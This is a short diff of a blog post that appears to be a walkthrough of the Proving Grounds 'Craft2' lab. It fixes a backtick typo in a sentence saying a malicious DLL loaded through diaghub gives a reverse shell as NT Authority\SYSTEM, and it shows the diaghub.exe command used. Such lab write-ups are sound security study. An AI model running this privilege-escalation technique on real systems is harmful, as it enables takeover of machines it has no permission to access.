ace00k/ace00k.github.io/_posts/2023-09-18-Craft2-Proving-Grounds.md

 ```
 {: .nolineno }

-When we execute diaghub, specifying the malicious DLL, we will obtain a reverse shell as `NT Authority\SYSTEM.
+When we execute diaghub, specifying the malicious DLL, we will obtain a reverse shell as `NT Authority\SYSTEM`.

 ```
 C:\ProgramData>.\diaghub.exe C:\\programdata\\ test.dll